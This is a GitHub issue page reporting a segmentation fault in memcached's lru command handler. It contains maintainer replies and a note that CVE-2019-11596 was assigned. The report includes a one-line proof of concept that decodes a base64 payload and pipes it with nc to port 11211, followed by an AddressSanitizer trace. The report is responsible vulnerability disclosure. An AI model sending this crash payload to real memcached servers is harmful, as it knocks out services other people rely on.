Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

segfault (null pointer dereference) during lru command handling #474

Closed
stze opened this issue Apr 10, 2019 · 3 comments

Comments

Projects
None yet
3 participants
@stze
Copy link

commented Apr 10, 2019

Dear memcached team —

I have detected a SIGSEGV during the lru command handling.

Version

bb0980f

How to reproduce

Start memcached
$ memcached
Send malicious payload via nc:
$ echo -n "bHJ1IG1vZGUKb7G0AGxydWRl6gdtTk9UXw==" | base64 -d | nc 127.0.0.1 11211

ASAN

AddressSanitizer:DEADLYSIGNAL
=================================================================
==14929==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000582a7e bp 0x7f6082dfa8d0 sp 0x7f6082dfa780 T4)
==14929==The signal is caused by a READ memory access.
==14929==Hint: address points to the zero page.
    #0 0x582a7d in __wrap_strcmp (/home/stze/Documents/repositories/memcached/memcached+0x582a7d)
    #1 0x547ac4 in process_lru_command /home/stze/Documents/repositories/memcached/memcached.c:4543:13
    #2 0x54055d in process_command /home/stze/Documents/repositories/memcached/memcached.c:4920:9
    #3 0x53b30c in try_read_command /home/stze/Documents/repositories/memcached/memcached.c:5064:9
    #4 0x52a48e in drive_machine /home/stze/Documents/repositories/memcached/memcached.c:5500:17
    #5 0x52c76a in event_handler /home/stze/Documents/repositories/memcached/memcached.c:5782:5
    #6 0x7f6088099030  (/lib64/libevent-2.1.so.6+0x24030)
    #7 0x7f60880997c6 in event_base_loop (/lib64/libevent-2.1.so.6+0x247c6)
    #8 0x56f7ff in worker_libevent /home/stze/Documents/repositories/memcached/thread.c:387:5
    #9 0x7f608805b58d in start_thread (/lib64/libpthread.so.0+0x858d)
    #10 0x7f6087dd9682 in __GI___clone (/lib64/libc.so.6+0xfd682)

Please let me know what additional information I can provide to successfully reproduce the issue.

@dormando

This comment has been minimized.

Copy link
Member

commented Apr 10, 2019

thanks! Looks like I got lazy while writing that handler :(

@dormando

This comment has been minimized.

Copy link
Member

commented Apr 27, 2019

bug was also in lru temp_ttl.

@carnil

This comment has been minimized.

Copy link

commented May 5, 2019

CVE-2019-11596 was assigned for this issue.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.